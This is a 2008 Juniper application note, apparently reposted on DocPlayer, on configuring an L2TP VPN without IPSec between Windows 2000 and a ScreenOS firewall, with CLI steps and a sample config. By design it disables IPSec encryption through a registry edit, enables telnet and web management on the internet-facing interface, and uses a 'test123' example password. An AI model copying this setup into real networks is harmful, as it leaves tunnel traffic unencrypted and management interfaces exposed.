L2TP Configuration without IPSec



Similar documents
Interface Failover with Route Based VPNs. Version 1.4

Interface Failover with Route Based VPNs. Version 1.2 ScreenOS and higher

Configuring a Lan-to-Lan VPN with SSG5 and Check Point Appliance Safe@Office 500

Configuring a Dial-up VPN Using Windows XP Client with L2TP Over IPSec (without NetScreen-Remote)

Application Notes for Configuring SIP Trunking between XO Communications XO SIP Service and Avaya Communication Manager Branch Edition Issue 1.

Create a VPN between an Allied Telesis and a NetScreen Router

Configuring a Lan-to-Lan VPN with Overlapping Subnets with Juniper NetScreen/ISG/SSG Products

Abstract. Avaya Solution & Interoperability Test Lab

How To Configure L2TP VPN Connection for MAC OS X client

Setting up an icap Server for ISG- 1000/2000 AV Support

Application Note. Using a Windows NT Domain / Active Directory for User Authentication NetScreen Devices 8/15/02 Jay Ratford Version 1.

Astaro Security Gateway V8. Remote Access via L2TP over IPSec Configuring ASG and Client

How To Configure SSL VPN in Cyberoam

I. What is VPN? II. Types of VPN connection. There are two types of VPN connection:

After you have created your text file, see Adding a Log Source.

Configuring SSL VPN on the Cisco ISA500 Security Appliance

IPsec VPN Application Guide REV:

Configuring Global Protect SSL VPN with a user-defined port

Creating a Gateway to Client VPN between Sidewinder G2 and a Mac OS X Client

Juniper Networks Integrated Firewall and IPSec VPN Evaluators Guide

Matrix Technical Support Mailer 167 NAVAN CNX200 PPTP VPN with Windows Client

Configuring a FortiGate unit as an L2TP/IPsec server

Note: This case study utilizes Packet Tracer. Please see the Chapter 5 Packet Tracer file located in Supplemental Materials.

Configuration Guide. How to set up the IPSec site-to-site Tunnel between the D-Link DSR Router and the Sonicwall Firewall.

Lab a Configure Remote Access Using Cisco Easy VPN

H3C SSL VPN RADIUS Authentication Configuration Example

Apache CloudStack 4.x (incubating) Network Setup: excerpt from Installation Guide. Revised February 28, :32 pm Pacific

Configuring a Check Point FireWall-1 to SOHO IPSec Tunnel

Lab 4.4.8a Configure a Cisco GRE over IPSec Tunnel using SDM

Configuring the OfficeConnect Secure Gateway for a remote L2TP over IPSec connection

VPN L2TP Application. Installation Guide

CREATING AN IKE IPSEC TUNNEL BETWEEN AN INTERNET SECURITY ROUTER AND A WINDOWS 2000/XP PC

How to Configure Web Authentication on a ProCurve Switch

TECHNICAL NOTE SETTING UP A STRM UPDATE SERVER. Configuring your Update Server

Using IPsec VPN to provide communication between offices

Configuring an IPsec VPN to provide ios devices with secure, remote access to the network

Setting up VPN Access for Remote Diagnostics Support

For paid computer support call

Version 1.0 ScreenOS and higher.

Identity-Based Application and Network Profiling

How To Configure Apple ipad for Cyberoam L2TP

DIGIPASS Authentication for Juniper ScreenOS

Concepts & Examples ScreenOS Reference Guide

Phone: Fax: Box: 230

Phone: Fax: Box: 230

PT Activity: Configure Cisco Routers for Syslog, NTP, and SSH Operations

Configuring Check Point VPN-1/FireWall-1 and SecuRemote Client with Avaya IP Softphone via NAT - Issue 1.0

OvisLink 8000VPN VPN Guide WL/IP-8000VPN. Version 0.6

Chapter 8 Lab B: Configuring a Remote Access VPN Server and Client

Configuring the Juniper SSG as an IPSec VPN Head-end to Support the Avaya VPNremote Phone and Avaya Phone Manager Pro with Avaya IP Office Issue 1.

How To - Implement Clientless Single Sign On Authentication with Active Directory

Configuring Serial Interface WAN and LAN for SSG Firewall/VPN Products

Junos Pulse. Windows In-Box Junos Pulse Client Quick Start Guide. Published: Copyright 2013, Juniper Networks, Inc.

University Computing & Telecommunications Virtual Private Networking: How To/Self- Help Guide Windows 8.1 Operating System.

Configuring the PIX Firewall with PDM

NAC Guest. Lab Exercises

INTEGRATION GUIDE. DIGIPASS Authentication for Cisco ASA 5505

How To Authenticate An Ssl Vpn With Libap On A Safeprocess On A Libp Server On A Fortigate On A Pc Or Ipad On A Ipad Or Ipa On A Macbook Or Ipod On A Network

Pre-lab and In-class Laboratory Exercise 10 (L10)

How to Configure the Juniper NetScreen 5GT to Support Avaya H.323 IP Telephony Issue 1.0

Network Configuration Example

Cisco - Configure the 1721 Router for VLANs Using a Switch Module (WIC-4ESW)

Netgear ProSafe VPN firewall (FVS318 or FVM318) to Cisco PIX firewall

SonicOS 5.9 / / 6.2 Log Events Reference Guide with Enhanced Logging

ActivIdentity 4TRESS AAA Web Tokens and SSL VPN Fortinet Secure Access. Integration Handbook

Configuring IPsec VPN with a FortiGate and a Cisco ASA

How To Establish IPSec VPN connection between Cyberoam and Mikrotik router

How to configure MAC authentication on a ProCurve switch

By default, STRM provides an untrusted SSL certificate. You can replace the untrusted SSL certificate with a self-signed or trusted certificate.

Configuring IPSec VPN Tunnel between NetScreen Remote Client and RN300

Lab Configure Remote Access Using Cisco Easy VPN

NETASQ ACTIVE DIRECTORY INTEGRATION

LifeSize Video Communications Systems Administrator Guide

Configuration Guide. How to set up the IPSec site-to-site Tunnel between the D-Link DSR Router and the Fortinet Firewall. Overview

Prestige 202H Plus. Quick Start Guide. ISDN Internet Access Router. Version /2004

7.1. Remote Access Connection

How To Establish Site-to-Site VPN Connection. using Preshared Key. Applicable Version: onwards. Overview. Scenario. Site A Configuration

Establishing a VPN tunnel to CNet CWR-854 VPN router using WinXP IPSec client

ASA 8.X: Routing SSL VPN Traffic through Tunneled Default Gateway Configuration Example

How To Configure Syslog over VPN

How To Industrial Networking

Firewall VPN Router. Quick Installation Guide M73-APO09-380

Configuring RADIUS Dial Up with Livingston Server Authentication

PULSE. Pulse for Windows Phone Quick Start Guide. Release Published Date

Configuring the Juniper NetScreen Firewall Security Policies to support Avaya IP Telephony Issue 1.0

Quick Start Guide. WRV210 Wireless-G VPN Router with RangeBooster. Cisco Small Business

V310 Support Note Version 1.0 November, 2011

Using a VPN with Niagara Systems. v0.3 6, July 2013

Deployment Guide AX Series for Palo Alto Networks Firewall Load Balancing

Using IKEv2 on Juniper Networks Junos Pulse Secure Access Appliance

RF550VPN and RF560VPN

Overview. Author: Seth Scardefield Updated 11/11/2013

Objectives. Background. Required Resources. CCNA Security

Identity-Based Traffic Logging and Reporting

How to Setup PPTP VPN Between a Windows PPTP Client and the DIR-130.

Intel Active Management Technology with System Defense Feature Quick Start Guide

Executive Summary and Purpose

Configuration Guide. How to set up the IPSec site-to-site Tunnel between the D-Link DSR Router and the Cisco Firewall. Overview

How to Create a Basic VPN Connection in Panda GateDefender eseries

Configuration Guide. How to Configure SSL VPN Features in DSR Series. Overview

Transcription:

Application Note L2TP Configuration without IPSec Version 1.0 January 2008 Juniper Networks, Inc. 1194 North Mathilda Avenue Sunnyvale, CA 94089 USA 408 745 2000 or 888 JUNIPER www.juniper.net

Contents Contents...2 Introduction...3 Included Platforms and ScreenOS...3 Overview...3 Network Diagram...4 Configuration Overview...4 Configuration Steps...5 Step 1 : Define L2TP user...5 Step 2: Define IP pool...6 Step 3: Configure default L2TP setting...7 Step 4: Create L2TP tunnel...8 Step 5: Define address object for internal resource...9 Step 6: Create policy...10 Step 7: Configure Windows 2000 native L2TP connection...11 Verifying Configuration...21 Sample Configuration...23 2 Copyright 2007, Juniper Networks, Inc.

Introduction The purpose of this application note is to assist a customer in setting up a remote VPN tunnel using L2TP from a client PC running Microsoft Windows 2000 to Juniper firewall. Included Platforms and ScreenOS This application note demonstrates firewall setup on ScreenOS 5.4r8. However, it also applies to following ScreenOS version: ScreenOS 5.0 ScreenOS 5.1 ScreenOS 5.2 ScreenOS 5.3 ScreenOS 5.4 ScreenOS 6.0 The product list includes the following: NS5000 ISG1000/2000 NS500/200/50/25 SSG550m/550/520m/520/320/350/140 NS5GT SSG5/20 Overview To configure a VPN connection using L2TP to a Juniper firewall, a native Microsoft L2TP VPN connection can be used. This application note will provide step-by-step procedures to configure a L2TP VPN connection between Microsoft Windows 2000 and a Juniper firewall. Copyright 2007, Juniper Networks, Inc. 3

Network Diagram Refer to Figure 1 below for Network Topology used for this configuration example. Figure 1. L2TP Client Internet Internal Resources 6.0.0.0/24 Configuration Overview To setup a L2TP tunnel, the customer needs to: 1. Define a L2TP user login and password 2. Define an IP pool for address assignment 3. Configure L2TP default settings 4. Create L2TP tunnel 5. Define an address object for internal resources 6. Create a policy to enable L2TP traffic 7. Configure native L2TP connection on Windows 2000 4 Copyright 2007, Juniper Networks, Inc.

Configuration Steps Step 1 : Define L2TP user To define a L2TP user, you need to configure a L2TP user name and password. In this example, we will define the L2TP user l2-user1 with password test123. WebUI: Select Objects > Users > Local, then click New. Enter following, then click OK. CLI: User Name: l2-user1 Status: Enable (selected) L2TP User: (selected) User Password: test123 (enter the password) Confirm Password: test123 (enter the password) set user l2-user1 type l2tp set user l2-user1 password test123 Copyright 2007, Juniper Networks, Inc. 5

Step 2: Define IP pool An IP pool is used to assign a IP address to the L2TP client. Here, we will define a IP pool that will assign IP addresses in the range of 6.0.0.100 to 6.0.0.110 to the L2TP client. WebUI: Select Object > IP Pools, then click New. Enter following and click OK. IP Pool Name: L2-pool Start IP: 6.0.0.100 End IP: 6.0.0.110 CLI: set ippool l2-pool 6.0.0.100 6.0.0.110 6 Copyright 2007, Juniper Networks, Inc.

Step 3: Configure default L2TP settings The default L2TP setting including IP pool assignment, PPP Authentication protocol, DNS server setting and WINS server setting can be configured on this L2TP default setting page. WebUI: Select VPNs > L2TP > Default Settings, then enter following. Click Apply when finished. CLI: IP Pool Name: l2-pool PPP Authentication: CHAP DNS Primary Server IP: 1.1.1.1 DNS Secondary Server IP: 1.1.1.2 set l2tp default dns1 1.1.1.1 set l2tp default dns2 1.1.1.2 set l2tp default ippool "l2-pool" set l2tp default ppp-auth chap Copyright 2007, Juniper Networks, Inc. 7

Step 4: Create L2TP tunnel Create the L2TP tunnel by specifying the outgoing interface and IP pool. WebUI: Select VPNs > L2TP > Tunnel, then click New. Enter following and click OK. Name: l2-tunnel Outgoing Interface: ethernet0/0 IP Pool Name: l2-pool CLI: set l2tp "l2-tunnel" outgoing-interface ethernet0/0 set l2tp "l2-tunnel" remote-setting ippool "l2-pool" 8 Copyright 2007, Juniper Networks, Inc.

Step 5: Define address object for internal resources An address object for internal resources is used in a policy to enforce traffic that passes through the firewall from the L2TP client. WebUI: Select Objects > Addresses > List, select Trust and click New. Enter following and click OK. Address Name: lan IP Address/Netmask: 6.0.0.0/24 CLI: set address trust lan 6.0.0.0/24 Copyright 2007, Juniper Networks, Inc. 9

Step 6: Create policy To enable the L2TP client to send traffic passing through the tunnel to internal resources, a policy is need. Here, we created a policy to enable any traffic from the L2TP client to access internal resource. WebUI: Select Policy with following selection, then click New. From: Untrust To: Trust Enter following and click OK. CLI: Source Address: Address Book Entry (selected), Dial-Up VPN Destination Address: Address Book Entry, lan L2TP: l2-tunnel set policy id 1 from "Untrust" to "Trust" "Dial-Up VPN" "lan" "ANY" tunnel l2tp "l2-tunnel" 10 Copyright 2007, Juniper Networks, Inc.

Step 7: Configure native L2TP connection on Windows 2000 By default, the native L2TP client in Windows 2000 is enabled with encryption. That is the default L2TP connection from Windows 2000 native client, that is L2TP over IPSec. To override this default behavior, we need to edit the registry key ProhibitIPSec. 1. Login to Windows 2000 as administrator. 2. Execute regedit to access the Windows 2000 registry. 3. Navigate to the following: LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services/RasMan/Parameters/ 4. If the ProhibitIPSec registry key exists, go to step 7. If the ProhibitIPSec registry key does not exist, create one: Select Edit > New > DWORD, then enter ProhibitIPSec on the new registry key. 5. Change the registry key value to 1. Copyright 2007, Juniper Networks, Inc. 11

6. Save the change and reboot the PC. 7. Select Start > Programs > Accessories > Communications > Network and Dialup Connection. 12 Copyright 2007, Juniper Networks, Inc.

8. Double click Make New Connection and click Next. Copyright 2007, Juniper Networks, Inc. 13

9. Select Connect to a private network through the Internet and click Next. 14 Copyright 2007, Juniper Networks, Inc.

10. Select Do not dial the initial connection and click Next. Copyright 2007, Juniper Networks, Inc. 15

11. Enter the IP address of the firewall (172.27.6.135) and click Next. 16 Copyright 2007, Juniper Networks, Inc.

12. Select For all users and click Next. Copyright 2007, Juniper Networks, Inc. 17

13. Click Next again and enter the connection name (L2TP_to_SSG140), then click Finish. 14. Select the L2TP connection icon (L2TP_to_SSG140), right click and select Properties. 18 Copyright 2007, Juniper Networks, Inc.

15. From the Security tag, select Allow these protocols. Uncheck all other protocols but just check Challenge Handshake Authentication Protocol (CHAP), then click OK. Copyright 2007, Juniper Networks, Inc. 19

16. From the Networking tag, select Layer-2 Tunneling Protocol (L2TP) from Type of VPN and click OK. 20 Copyright 2007, Juniper Networks, Inc.

Verifying Configuration The configuration can be verified by connecting the PC L2TP client to firewall. 1. From Network and Dial-up Connections, double click the L2TP connection icon. 2. From the connect window, enter username and password, then click Connect. 3. When the connection is done, a connection complete window will be prompted. Copyright 2007, Juniper Networks, Inc. 21

4. After connected, open a command prompt. From the command prompt, execute the command ipconfig to check the IP address assigned. 5. From the command prompt, ping to internal resources to check connectivity. 6. From the firewall CLI, check the L2TP tunnel status: SSG140-> get l2tp l2-tunnel active L2TP Name Tunnel Id Peer Address Port Peer Host Calls State t_info --------------- --------- --------------- ---- ------------ ----- ------- --HEX--- l2-tunnel ( 4/ 4) 172.27.6.66 1701 tac1.tac1.ap 1 estblsh 80008004 call id(local/peer)=(1/1) assigned ip=6.0.0.100, user="l2-user1", type=incoming, state=establish Logged in at: 01/28/2008 16:28:31 l2-tunnel ( 0/ 0) 0.0.0.0 0 0 idle 80000001 From the above output, it shows the source IP of the L2TP client and connection status In addition, it shows the username and IP addresss assigned to the L2TP connection. 22 Copyright 2007, Juniper Networks, Inc.

Sample Configuration SSG140-> get config Total Config size 3692: set clock timezone 0 set vrouter trust-vr sharable set vrouter "untrust-vr" exit set vrouter "trust-vr" unset auto-route-export exit set auth-server "Local" id 0 set auth-server "Local" server-name "Local" set auth default auth server "Local" set auth radius accounting port 1646 set admin name "netscreen" set admin password "nkvum2rwmuzpcrkg5swihdctqkaibn" set admin auth timeout 10 set admin auth server "Local" set admin format dos set zone "Trust" vrouter "trust-vr" set zone "Untrust" vrouter "trust-vr" set zone "DMZ" vrouter "trust-vr" set zone "VLAN" vrouter "trust-vr" set zone "Untrust-Tun" vrouter "trust-vr" set zone "Trust" tcp-rst set zone "Untrust" block unset zone "Untrust" tcp-rst set zone "MGT" block set zone "DMZ" tcp-rst set zone "VLAN" block unset zone "VLAN" tcp-rst set zone "Untrust" screen tear-drop set zone "Untrust" screen syn-flood set zone "Untrust" screen ping-death set zone "Untrust" screen ip-filter-src set zone "Untrust" screen land set zone "V1-Untrust" screen tear-drop set zone "V1-Untrust" screen syn-flood set zone "V1-Untrust" screen ping-death set zone "V1-Untrust" screen ip-filter-src set zone "V1-Untrust" screen land set interface "ethernet0/0" zone "Untrust" set interface "ethernet0/1" zone "DMZ" set interface "ethernet0/2" zone "Trust" set interface "bri1/0" zone "Untrust" set interface ethernet0/0 ip 172.27.6.135/24 set interface ethernet0/0 route unset interface vlan1 ip set interface ethernet0/2 ip 6.0.0.1/24 set interface ethernet0/2 route unset interface vlan1 bypass-others-ipsec unset interface vlan1 bypass-non-ip set interface ethernet0/0 ip manageable set interface ethernet0/2 ip manageable set interface ethernet0/0 manage ping set interface ethernet0/0 manage ssh set interface ethernet0/0 manage telnet set interface ethernet0/0 manage snmp set interface ethernet0/0 manage ssl set interface ethernet0/0 manage web set interface ethernet0/0 manage mtrace set interface ethernet0/2 manage mtrace unset flow no-tcp-seq-check set flow tcp-syn-check set console timeout 0 set pki authority default scep mode "auto" set pki x509 default cert-path partial set address "Trust" "lan" 6.0.0.0 255.255.255.0 set ippool "l2-pool" 6.0.0.100 6.0.0.110 Copyright 2007, Juniper Networks, Inc. 23

set user "l2-user1" uid 1 set user "l2-user1" type l2tp set user "l2-user1" password "mlfwmnhhnozn2fsyjdcrjf4ncinckcsfsq==" unset user "l2-user1" type auth set user "l2-user1" "enable" set ike respond-bad-spi 1 unset ike ikeid-enumeration unset ike dos-protection unset ipsec access-session enable set ipsec access-session maximum 5000 set ipsec access-session upper-threshold 0 set ipsec access-session lower-threshold 0 set ipsec access-session dead-p2-sa-timeout 0 unset ipsec access-session log-error unset ipsec access-session info-exch-connected unset ipsec access-session use-error-log set l2tp default dns1 1.1.1.1 set l2tp default dns2 1.1.1.2 set l2tp default ippool "l2-pool" set l2tp default ppp-auth chap set l2tp "l2-tunnel" id 1 outgoing-interface ethernet0/0 set l2tp "l2-tunnel" remote-setting ippool "l2-pool" set url protocol websense exit set policy id 1 from "Untrust" to "Trust" "Dial-Up VPN" "lan" "ANY" tunnel l2tp "l2-tunnel" log set policy id 1 exit set nsmgmt bulkcli reboot-timeout 60 set nsmgmt bulkcli reboot-wait 0 set ssh version v2 set config lock timeout 5 set snmp port listen 161 set snmp port trap 162 set vrouter "untrust-vr" exit set vrouter "trust-vr" unset add-default-route set route 0.0.0.0/0 gateway 172.27.6.1 set route 172.27.0.0/16 gateway 172.27.6.1 exit set vrouter "untrust-vr" exit set vrouter "trust-vr" exit SSG140-> Copyright 2007, Juniper Networks, Inc. All rights reserved. Juniper Networks and the Juniper Networks logo are registered trademarks of Juniper Networks, Inc. in the United States and other countries. All other trademarks, service marks, registered trademarks, or registered service marks in this document are the property of Juniper Networks or their respective owners. All specifications are subject to change without notice. Juniper Networks assumes no responsibility for any inaccuracies in this document or for any obligation to update information in this document. Juniper Networks reserves the right to change, modify, transfer, or otherwise revise this publication without notice. 24 Copyright 2007, Juniper Networks, Inc.

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information